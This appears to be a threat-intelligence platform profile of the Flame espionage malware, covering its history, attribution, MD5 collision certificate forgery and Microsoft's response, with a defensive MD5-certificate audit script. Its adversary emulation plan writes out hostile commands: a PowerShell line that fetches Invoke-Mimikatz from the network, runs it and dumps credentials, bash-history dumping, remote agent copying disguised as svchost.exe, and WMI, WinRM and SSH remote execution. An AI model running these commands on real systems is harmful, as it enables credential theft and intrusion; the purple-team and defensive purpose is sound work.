Threat Actor

Flame

flame · us_israel_joint_offensive_cyber_speculation · active since 2007-12

Flame (canonical Kaspersky naming derived from main module FROG.DefaultAttacks.A-InstallFlame + MAHER Iranian CERT naming "Flamer" + CrySyS Lab naming "sKyWIper" / "Skywiper" + common alternative naming "Da Flame", per the joint canonical May 28, 2012 disclosure announced simultaneously by the MAHER Center Iranian National CERT + Kaspersky Lab + CrySyS Lab of Budapest University of Technology and Economics) is a massive ~20MB modular cyber-espionage platform, operationally one of the most complex malware platforms ever found per the CrySyS Lab canonical 2012 assessment ("certainly the most sophisticated malware we encountered during our practice. Arguably, it is the most complex malware ever found"; per Kaspersky "twenty times more complicated than Stuxnet") + the first publicly-known cryptographic-attack-as-malware-spread mechanism via a signature novel MD5 chosen-prefix collision attack enabling forged Microsoft Update digital certificate masquerading (Centrum Wiskunde & Informatica CWI cryptanalyst Marc Stevens canonical analysis: "Flame uses a completely new variant of a 'chosen prefix collision attack' to impersonate a legitimate security update from Microsoft").

speculatively attributed to US-Israel joint offensive cyber operation cluster cell coherence with Stuxnet Olympic Games operation per Kaspersky shared-development-team attribution hypothesis + adjacent timing/target overlap with Stuxnet (Flame active in the wild since at least February 2010 per Kaspersky, with CrySyS-observed main component filename as early as December 2007)

active 2007-2012+; operational discovery context: the UN International Telecommunication Union (ITU) commissioned Kaspersky to investigate the "Wiper" malware affecting Iranian Oil Ministry computers, which had caused Iranian officials to disconnect oil terminals from the internet in April 2012; Kaspersky discovered Flame as a separate infection while investigating Wiper.

comprehensive multi-modal surveillance capability (audio recording via microphone + screen capture screenshots + keyboard activity keylogger + network traffic capture + Skype conversation recording + signature Bluetooth beacon contact harvesting from nearby Bluetooth-enabled devices) + Lua embedded scripting + SQLite embedded database within modular platform architecture.

~600 modules / target-organization-specific deployment.

USB stick + LAN + signature Windows Update MitM via forged Microsoft digital certificate propagation.

targets Iran (Oil Ministry primary) + Israel + Sudan + Syria + Lebanon + Saudi Arabia + Egypt + other Middle Eastern countries.

Microsoft response included Microsoft Security Response Center revoking fraudulent intermediate Certificate Authorities + issuing KB2718704 security advisory + updating Terminal Server licensing systems configuration that had enabled the certificate chain abuse (operationally significant Microsoft acknowledgment that Flame's certificate chain abuse exploited configuration error in Terminal Server licensing infrastructure)

operators issued a suicide self-destruct command to infected systems shortly after the May 28, 2012 disclosure, attempting to defeat forensic recovery.

signature false creation date metadata 1994 per CrySyS.

Kaspersky Lessons Learned three-year retrospective May 27, 2015 documented initial industry skepticism ("Flame is lame... A 20 megabytes malware can be l33t? Impossible!") which "died when the Microsoft Windows Updates attack and MD5 collision was found and patched".

fills the 2nd Olympic Games / US-Israel joint cyber-operations cell in the curated corpus following Stuxnet (1st) and operationally precedes Duqu (3rd); operationally significant cluster-cell coherence with the Stuxnet + Duqu siblings per the Kaspersky shared-development-team attribution hypothesis.

canonical "most complex malware ever found" industry reference point + first publicly-known novel-cryptographic-attack-as-malware-spread mechanism, cited in essentially all subsequent state-actor-tier modular cyber-espionage platform industry analyses through the 2012-2026 period.

us_israel_joint_offensive_cyber_speculation · confidence: high · 12 aliases
Sigma rules: 200 · YARA rules: 1 · Live IOCs: 0 · CVEs exploited: 0

Profile

Flame (canonical Kaspersky naming derived from main module FROG.DefaultAttacks.A-InstallFlame + MAHER Iranian CERT naming "Flamer" + CrySyS Lab naming "sKyWIper" / "Skywiper" + common alternative naming "Da Flame" per joint canonical May 28, 2012 disclosure) is a massive ~20MB modular cyber-espionage platform, operationally one of the most complex malware platforms ever found per the CrySyS Lab canonical 2012 assessment ("certainly the most sophisticated malware we encountered during our practice. Arguably, it is the most complex malware ever found") + the first publicly-known cryptographic-attack-as-malware-spread mechanism via a signature novel MD5 chosen-prefix collision attack enabling forged Microsoft Update digital certificate masquerading. Speculatively attributed to a US-Israel joint offensive cyber operation (cluster cell coherence with the Stuxnet Olympic Games operation) per the Kaspersky shared-development-team attribution hypothesis + adjacent timing/target overlap with Stuxnet + geographic targeting overlap (Iran + Middle East intelligence-collection mission profile), though formal public attribution remains operationally less explicit than the Stuxnet canonical Olympic Games attribution. Active 2007-2012+ per the CrySyS observed component date + Kaspersky in-the-wild assessment, with primary operational mission objectives of comprehensive cyber-espionage against Iranian and Middle Eastern targets.

Operational phases:
  1. FLAME EARLIEST ACTIVITY (December 2007): CrySyS-observed main component filename.
  2. FLAME ACTIVE IN THE WILD (February 2010+): multi-year covert operational deployment.
  3. IRANIAN OIL MINISTRY APRIL 2012 INTERNET DISCONNECT: the Iranian Students News Agency calls the attacking malware "Wiper."
  4. UN ITU KASPERSKY INVESTIGATION COMMISSIONING: Kaspersky discovers Flame while investigating Wiper.
  5. JOINT CANONICAL DISCLOSURE (May 28, 2012): MAHER + Kaspersky + CrySyS three-organization coordinated disclosure.
  6. CWI MARC STEVENS MD5 COLLISION ATTACK ANALYSIS (2012): novel chosen-prefix collision attack variant analysis.
  7. MICROSOFT KB2718704 + CA REVOCATION (June 2012): fraudulent intermediate CAs revoked + Terminal Server licensing fix.
  8. FLAME SUICIDE SELF-DESTRUCT COMMAND (June 2012): operators issue a kill command to infected systems post-disclosure.
  9. KASPERSKY LESSONS LEARNED RETROSPECTIVE (2015): three-year retrospective consolidating the canonical industry assessment.

Signature operational tradecraft
  • Massive ~20MB modular cyber-espionage platform architecture (cluster-defining): per CrySyS, "the most complex malware ever found" + per Kaspersky, "twenty times more complicated than Stuxnet"; ~600 modules / target-organization-specific deployment.
  • Microsoft Update MD5 collision attack (cluster-defining cryptographic attack): signature novel chosen-prefix collision attack on the MD5 hash function enabling a forged Microsoft digital certificate; first publicly-known cryptographic-attack-as-malware-spread mechanism per CWI Marc Stevens canonical cryptanalysis.
  • Joint MAHER + Kaspersky + CrySyS canonical disclosure (signature): three-organization coordinated public disclosure, operationally distinct from single-source malware disclosures.
  • Comprehensive multi-modal surveillance capability (signature): audio (microphone) + screen capture + keyboard activity + network traffic + Skype conversation recording + Bluetooth beacon contact harvesting from nearby devices.
  • Lua embedded scripting + SQLite embedded database (signature): signature embedded scripting + persistence infrastructure within modular platform.
  • USB stick + LAN propagation: signature multi-vector propagation including Windows Update MitM via forged certificate.
  • False creation date metadata 1994 (signature): per CrySyS, creation dates falsely set as early as 1994.
  • Suicide self-destruct command (signature): operators issued a kill command to infected systems post-public-disclosure to defeat forensic recovery.
  • Documented target footprint: Iran (Oil Ministry + primary target) + Israel + Sudan + Syria + Lebanon + Saudi Arabia + Egypt + other Middle Eastern countries.
  • Cluster-cell coherence with Stuxnet + Duqu (signature): per the Kaspersky shared-development-team hypothesis, operationally significant for cluster-cell coherence of the Olympic Games / US-Israel joint cyber-operations cell. The cluster fills the 2nd Olympic Games / US-Israel joint cyber-operations cell in this curated corpus following Stuxnet (1st). Operationally significant as the canonical "most complex malware ever found" industry reference point + first publicly-known novel-cryptographic-attack-as-malware-spread mechanism cited in essentially all subsequent state-actor-tier modular cyber-espionage platform industry analyses.

Aliases

12 aliases: flame, flamer, skywiper, skywiper, da flame, worm.win32.flame, flame_malware, flame flamer skywiper, flame iran middle east cyber espionage, flame microsoft update md5 collision, twenty megabyte malware 2012, most complex malware ever found 2012

Adversary Emulation Plan

13 steps
Runnable Caldera emulation profile Worm - Move laterally any way possible. Ordered along the attack lifecycle; each step maps to an ATT&CK technique with a concrete executor command. For authorized red-team / purple-team exercises only.
0 collection T1005 · Data from Local System darwin, linux
Parse SSH config
pip install stormssh && storm list
1 credential-access T1552.003 · Unsecured Credentials: Bash History darwin, linux
Dump history
find ~/.bash_sessions -name '*' -exec cat {} \; 2>/dev/null
2 discovery T1135 · Network Share Discovery windows
View admin shares
Get-SmbShare | ConvertTo-Json
3 discovery T1018 · Remote System Discovery darwin, linux, windows
Collect ARP details
arp -a
Run PowerKatz
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $True };
$web = (New-Object System.Net.WebClient);
$result = $web.DownloadString("https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/4c7a2016fc7931cd37273c5d8e17b16d959867b3/Exfiltration/Invoke-Mimikatz.ps1");
iex $result; Invoke-Mimikatz -DumpCreds
5 discovery T1018 · Remote System Discovery windows
Find Hostname
nbtstat -A #{remote.host.ip}
6 discovery T1018 · Remote System Discovery windows
Reverse nslookup IP
nslookup #{remote.host.ip}
Mount Share
net use \\#{remote.host.fqdn}\C$ /user:#{domain.user.name} #{domain.user.password}
Copy 54ndc47 (SMB)
$path = "sandcat.go-windows";
$drive = "\\#{remote.host.fqdn}\C$";
Copy-Item -v -Path $path -Destination $drive"\Users\Public\s4ndc4t.exe";
9 lateral-movement T1570 · Lateral Tool Transfer windows, darwin, linux
Copy 54ndc47 (WinRM and SCP)
$job = Start-Job -ScriptBlock {
  $username = "#{domain.user.name}";
  $password = "#{domain.user.password}";
  $secstr = New-Object -TypeName System.Security.SecureString;
  $password.ToCharArray() | ForEach-Object {$secstr.AppendChar($_)};
  $cred = New-Object -Typename System.Management.Automation.PSCredential -Argumentlist $username, $secstr;
  $session = New-PSSession -ComputerName "#{remote.host.name}" -Credential $cred;
  $location = "#{location}";
  $exe = "#{exe_name}";
  Copy-Item $location -Destination "C:\Users\Public\svchost.exe" -ToSession $session;
  Start-Sleep -s 5;
  Remove-PSSession -Session $session;
};
Receive-Job -Job $job -Wait;
Start 54ndc47 (WMI)
$node = '''#{remote.host.fqdn}''';
$user = '''#{domain.user.name}''';
$password = '''#{domain.user.password}''';
wmic /node:$node /user:$user /password:$password process call create "powershell.exe C:\Users\Public\s4ndc4t.exe -server #{server} -group #{group}";
Start Agent (WinRM)
$username = "#{domain.user.name}";
$password = "#{domain.user.password}";
$secstr = New-Object -TypeName System.Security.SecureString;
$password.ToCharArray() | ForEach-Object {$secstr.AppendChar($_)};
$cred = New-Object -Typename System.Management.Automation.PSCredential -Argumentlist $username, $secstr;
$session = New-PSSession -ComputerName #{remote.host.name} -Credential $cred;
Invoke-Command -Session $session -ScriptBlock{start-job -scriptblock{cmd.exe /c start C:\Users\Public\svchost.exe -server #{server} }};
Start-Sleep -s 5;
Remove-PSSession -Session $session;
12 lateral-movement T1021.004 · Remote Services: SSH darwin, linux
Start 54ndc47
scp -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o ConnectTimeout=3 sandcat.go-darwin #{remote.ssh.cmd}:~/sandcat.go &&
ssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o ConnectTimeout=3 #{remote.ssh.cmd} 'nohup ./sandcat.go -server #{server} -group red 1>/dev/null 2>/dev/null &'

Notable Campaigns

10 campaigns
  • 2015 · Kaspersky Lessons Learned Three Years Later (2015)
  • 2012-2026 · Continued Industry Reference Status (2012-2026)
  • 2012 · Iranian Oil Ministry April 2012 Internet Disconnect
  • 2012 · UN ITU Kaspersky Wiper Investigation Commissioning
  • 2012 · Flame Canonical Joint Disclosure (May 28, 2012)
  • 2012 · CWI Marc Stevens MD5 Collision Attack Analysis
  • 2012 · Microsoft Response KB2718704 + CA Revocation (June 2012)
  • 2012 · Flame Suicide Self-Destruct Command (June 2012)
  • 2010-2012 · Flame Active in the Wild (February 2010+)
  • 2007-2008 · Flame Earliest Activity (December 2007)

Attribution & Reporting

Attributed by
  • Kaspersky GReAT (canonical May 28 2012 disclosure, multiple researchers)
  • MAHER Center Iranian National Computer Emergency Response Team CERT (canonical May 28 2012 disclosure, initial "Flamer" naming)
  • CrySyS Lab Budapest University of Technology and Economics (canonical May 28 2012 disclosure, "sKyWIper" / "Skywiper" naming, "most complex malware ever found" assessment)
  • United Nations International Telecommunication Union ITU (Kaspersky investigation commissioning)
  • Centrum Wiskunde & Informatica CWI (Marc Stevens canonical chosen-prefix collision attack cryptanalysis)
  • Microsoft Security Response Center (CA revocation + KB2718704 advisory + Terminal Server licensing system fix June 2012)
  • McAfee Labs (Flame Microsoft Update MitM analysis)
  • Iran Atomic Energy Organization (Oil Ministry impact acknowledgment)
  • Symantec (Flame technical analysis)
  • F-Secure (Mikko Hyppönen historical analysis)
  • Iranian Students News Agency (Wiper initial naming reporting)
Key reporting
  • Kaspersky GReAT: Flame canonical analysis (Securelist, May 28, 2012), canonical Flame disclosure
  • MAHER Center Iranian National CERT: Flamer analysis (May 28, 2012), canonical Iranian government disclosure
  • CrySyS Lab Budapest University of Technology and Economics: sKyWIper/Skywiper analysis (May 28, 2012), canonical academic disclosure with "most complex malware ever found" assessment
  • Centrum Wiskunde & Informatica CWI (Marc Stevens): CWI cryptanalyst discovers new cryptographic attack variant in Flame spy malware, canonical chosen-prefix MD5 collision attack analysis
  • Microsoft Security Response Center: KB2718704 Microsoft Security Advisory (June 2012), canonical Microsoft response with CA revocation
  • McAfee Labs: Spreading the Flame, Skywiper Employs "Windows Update", canonical Microsoft Update MitM analysis
  • Kaspersky GReAT: Lessons learned from Flame, three years later (Securelist, May 27, 2015), canonical retrospective
  • Symantec: Flame technical analysis (2012)
  • F-Secure (Mikko Hyppönen): Flame historical analysis
  • MITRE ATT&CK Software S0143: Flame
  • Malpedia Software Profile: Flame

Operational

State sponsor

Speculatively attributed to a US-Israel joint offensive cyber operation (cluster cell coherence with the Stuxnet Olympic Games operation) per multiple convergent analyses, though formal public attribution remains operationally less explicit than the Stuxnet canonical Olympic Games attribution.

Cluster-cell-coherence attribution basis:
  (1) Kaspersky shared-development-team attribution hypothesis: per Kaspersky June 2012 follow-up analysis, code overlaps + development conventions + operational similarities between Flame and Stuxnet operationally suggest a shared development team or organizational affiliation. Per Kaspersky, "the same development team that created Stuxnet/Duqu also worked on Flame", though Kaspersky operationally framed this as a "different functional codebase but shared developer conventions" hypothesis rather than a direct shared-codebase provenance attribution.
  (2) Adjacent timing + target overlap with Stuxnet: per Wikipedia, "According to Kaspersky, Flame had been operating in the wild since at least February 2010", operationally adjacent to the Stuxnet deployment timeline (Stuxnet first installed at Natanz 2009, accidentally spread 2010). Per CrySyS Lab, "the file name of the main component was observed as early as December 2007", operationally suggesting that Flame development predates or parallels the Stuxnet development cycle.
  (3) Wiper / Iranian Oil Ministry adjacent impact: per Wikipedia + Infogalactic, the Flame discovery context involved Iranian Oil Ministry computers being affected by an attack in April 2012 that caused Iranian officials to disconnect oil terminals from the Internet. The Iranian Students News Agency initially referred to the attacking malware as "Wiper." Kaspersky believes Flame may be "a separate infection entirely" from Wiper, though Wiper subsequently became operationally associated with Olympic Games adjacent operations per industry analysis.
  (4) Geographic targeting overlap with Stuxnet: Flame operationally targets primarily Iran + Israel + Sudan + Syria + Lebanon + Saudi Arabia + Egypt and other Middle Eastern countries, operationally consistent with a US-Israel Middle East intelligence-collection mission profile.

Operational discovery + disclosure context:
  (a) United Nations International Telecommunication Union (ITU) commissioning: per Wikipedia + Grokipedia, "Kaspersky Lab was asked by the United Nations International Telecommunication Union to investigate reports of a virus affecting Iranian Oil Ministry computers. As Kaspersky Lab investigated, they discovered an MD5 hash and filename that appeared only on customer machines from Middle Eastern nations." Operationally significant ITU-commissioned investigation context: the Flame discovery was operationally a byproduct of investigating a different malware (Wiper) affecting Iranian critical infrastructure.
  (b) Joint MAHER Iran CERT + Kaspersky + CrySyS canonical May 28, 2012 disclosure: three-organization coordinated public disclosure (operationally distinct from typical single-source malware disclosures). The MAHER Center of the Iranian National CERT had independently detected indicators of compromise associated with the malware, referred to by them as "Flamer", a few days earlier and shared these publicly. Concurrently, the Laboratory of Cryptography and System Security (CrySyS Lab) at Budapest University of Technology and Economics published their canonical analysis using their internal naming "sKyWIper" / "Skywiper."
  (c) CrySyS Lab "most complex malware ever found" framing: per the CrySyS Lab canonical disclosure, Flame "is certainly the most sophisticated malware we encountered during our practice. Arguably, it is the most complex malware ever found." Per Kaspersky, the ~20MB fully-deployed Flame size was operationally unprecedented: "Previously, sophisticated malware would range in the order of kilobytes or hundreds of kilobytes. Most people would discard a 6MB executable file as too large to be malware." Per the Kaspersky lessons-learned retrospective, the "Flame is lame" skeptical industry reaction died when the Microsoft Windows Updates attack and MD5 collision were found and patched.

Operational signature Microsoft Update MD5 collision attack (cluster-defining): per Wikipedia + Grokipedia + CWI + McAfee analysis, Flame featured a signature novel chosen-prefix collision attack on the MD5 hash function enabling the malware to forge a valid Microsoft digital certificate for masquerading as a legitimate Windows Update; operationally significant as the first publicly-known cryptographic-attack-as-malware-spread mechanism. Per CWI Marc Stevens canonical cryptanalysis: "Flame uses a completely new variant of a 'chosen prefix collision attack' to impersonate a legitimate security update from Microsoft. Flame's ability stems from the fact that it is signed by a fraudulent certificate appearing to be originating from Microsoft which was obtained by launching a cryptographic collision attack. Analysis of this collision attack using our forensic tools has revealed the use of an as yet unknown variant of our chosen-prefix collision attack." Per McAfee analysis: "the attacker must perform a chosen prefix collision attack targeting an MD5 hash to create a forged certificate and make it acceptable for Vista and later. Years ago a paper titled 'MD5 Considered Harmful Today' authored by Alexander Sotirov, Marc Stevens, Jacob Appelbaum, Arjen Lenstra, David Molnar, Dag Arne Osvik and Benne de Weger described a very similar attack on x.509 certificates." Microsoft response: Microsoft revoked the fraudulent intermediate Certificate Authorities used by Flame in June 2012 + issued the KB2718704 advisory + updated the Terminal Server licensing systems that had originally enabled the certificate chain abuse.
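A defender-side check that follows from the collision attack and the Microsoft response above, added here as an example (not code from this page or from any of the organizations it cites): a dependency-free DER walker that reads the outer signatureAlgorithm OID of every certificate in a chain and flags MD5-based signatures, since an MD5-signed chain member is exactly the weak link a chosen-prefix collision forgery needs. The certificates in the sample chain are constructed placeholder byte strings with the RFC 5280 outer shape, not real Microsoft or Flame certificates.

```python
from __future__ import annotations

# Signature-algorithm OIDs whose digest is MD5: a chain member signed with one
# of these is the weak link a chosen-prefix collision forgery needs.
MD5_SIGNATURE_OIDS = {"1.2.840.113549.1.1.4": "md5WithRSAEncryption"}

def tlv(tag: int, body: bytes) -> bytes:
    """Encode one DER element (short- or long-form length)."""
    n = len(body)
    if n < 0x80:
        return bytes([tag, n]) + body
    size = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([tag, 0x80 | len(size)]) + size + body

def encode_oid(dotted: str) -> bytes:
    """Encode a dotted OID as a DER OBJECT IDENTIFIER (base-128 arcs)."""
    arcs = [int(a) for a in dotted.split(".")]
    out = [40 * arcs[0] + arcs[1]]
    for arc in arcs[2:]:
        chunk = [arc & 0x7F]
        arc >>= 7
        while arc:
            chunk.append(0x80 | (arc & 0x7F))
            arc >>= 7
        out.extend(reversed(chunk))
    return tlv(0x06, bytes(out))

def read_tlv(buf: bytes, pos: int) -> tuple[int, bytes, int]:
    """Return (tag, body, position after element) for the DER element at pos."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:                          # long-form length
        n = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    return tag, buf[pos:pos + length], pos + length

def decode_oid(body: bytes) -> str:
    """Decode OBJECT IDENTIFIER content octets back to dotted form."""
    arcs, value = [body[0] // 40, body[0] % 40], 0
    for b in body[1:]:
        value = (value << 7) | (b & 0x7F)
        if not b & 0x80:                       # last octet of this arc
            arcs.append(value)
            value = 0
    return ".".join(map(str, arcs))

def signature_algorithm(cert_der: bytes) -> str:
    """Dotted OID of Certificate.signatureAlgorithm (the outer one, RFC 5280)."""
    tag, cert, _ = read_tlv(cert_der, 0)
    if tag != 0x30:
        raise ValueError("certificate is not a DER SEQUENCE")
    _, _, pos = read_tlv(cert, 0)              # skip tbsCertificate
    _, alg_id, _ = read_tlv(cert, pos)         # AlgorithmIdentifier SEQUENCE
    tag, oid, _ = read_tlv(alg_id, 0)          # first element: the algorithm OID
    if tag != 0x06:
        raise ValueError("AlgorithmIdentifier does not start with an OID")
    return decode_oid(oid)

def audit_chain(chain: list[bytes]) -> list[tuple[int, str]]:
    """(index, algorithm name) for every chain member signed with MD5; 0 = leaf."""
    found = []
    for i, cert in enumerate(chain):
        name = MD5_SIGNATURE_OIDS.get(signature_algorithm(cert))
        if name:
            found.append((i, name))
    return found

def make_cert(sig_oid: str) -> bytes:
    """Constructed Certificate shape: SEQ { tbs, AlgorithmIdentifier, BIT STRING }.
    Placeholder bytes only, not a real or valid certificate."""
    tbs = tlv(0x30, tlv(0x02, b"\x01"))                    # tbsCertificate stub
    alg = tlv(0x30, encode_oid(sig_oid) + tlv(0x05, b""))  # OID + NULL parameters
    return tlv(0x30, tbs + alg + tlv(0x03, b"\x00" * 9))   # + signatureValue stub

# Constructed sample chain: leaf and root use sha256WithRSAEncryption; the
# intermediate is md5WithRSAEncryption, the weak link the audit must catch.
SAMPLE_CHAIN = [make_cert("1.2.840.113549.1.1.11"),
                make_cert("1.2.840.113549.1.1.4"),
                make_cert("1.2.840.113549.1.1.11")]
```

Feeding real DER chains (for example a Windows Update catalog's Authenticode chain) through `audit_chain` would flag the MD5-signed intermediate the same way the sample chain does.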
Operational target profile: documented Flame targets per Kaspersky + CrySyS + MAHER are Iran (primary; Oil Ministry computers operationally affected) + Israel + Sudan + Syria + Lebanon + Saudi Arabia + Egypt + other Middle Eastern countries. Per Wikipedia: "The program is used for targeted cyber espionage in Middle Eastern countries." Operational classification: nation-state-tier cyber-espionage operation operationally adjacent to the Stuxnet Olympic Games cluster, operationally significant as the most complex malware ever found per the CrySyS canonical 2012 assessment + first publicly-known cryptographic-attack-as-malware-spread mechanism via a novel MD5 chosen-prefix collision attack. The cluster fills the 2nd Olympic Games / US-Israel joint cyber-operations cell in this curated corpus following Stuxnet (1st). Operationally significant as the canonical "most complex malware ever found" industry reference point + first publicly-known novel-cryptographic-attack-as-malware-spread mechanism.

Motivations
iranian_middle_east_cyber_espionage_intelligence_collection, massive_modular_cyber_espionage_platform_capability_demonstration, signature_microsoft_update_md5_collision_attack_capability_demonstration, comprehensive_multi_modal_surveillance_capability_audio_video_keyboard_skype_bluetooth, iranian_oil_ministry_targeting, middle_east_government_targeting, cluster_cell_coherence_with_stuxnet_olympic_games_operation
Sectors
Regions

Detection Blind Spots

60 techniques
Across this actor’s 60 mapped techniques, the share covered by each detection layer. Low bars are where you’d be blind if this actor targeted you.
  • Behavioral / log (Sigma): 56/60 · 93%
  • Analytics (MITRE CAR): 25/60 · 41%
  • Runtime / container (Falco): 7/60 · 11%
  • File / malware (YARA): 0/60 · 0%
  • Network (Suricata/Snort): 15/60 · 25%
  • Vuln scan (Nuclei): 0/60 · 0%

Atomic Test Plan

30 techniques
Runnable Atomic Red Team tests covering this actor's mapped techniques, to validate your detections against this specific adversary. Cross-reference the blind spots above. For authorized lab / purple-team use.

Tools Used

0 mapped
Other tooling / TTPs (curation, not ATT&CK-mapped):
  • MD5 CHOSEN PREFIX COLLISION ATTACK
  • MICROPHONE AUDIO CAPTURE SURVEILLANCE MODULE
  • SCREEN CAPTURE SCREENSHOT SURVEILLANCE MODULE
  • SKYPE CONVERSATION RECORDING MODULE
  • SQLITE EMBEDDED DATABASE
  • SUICIDE SELF DESTRUCT COMMAND 2012
threatengine.sh  ·  Open-source threat intelligence platform  ·  100+ authoritative sources  ·  Every fact traces to its origin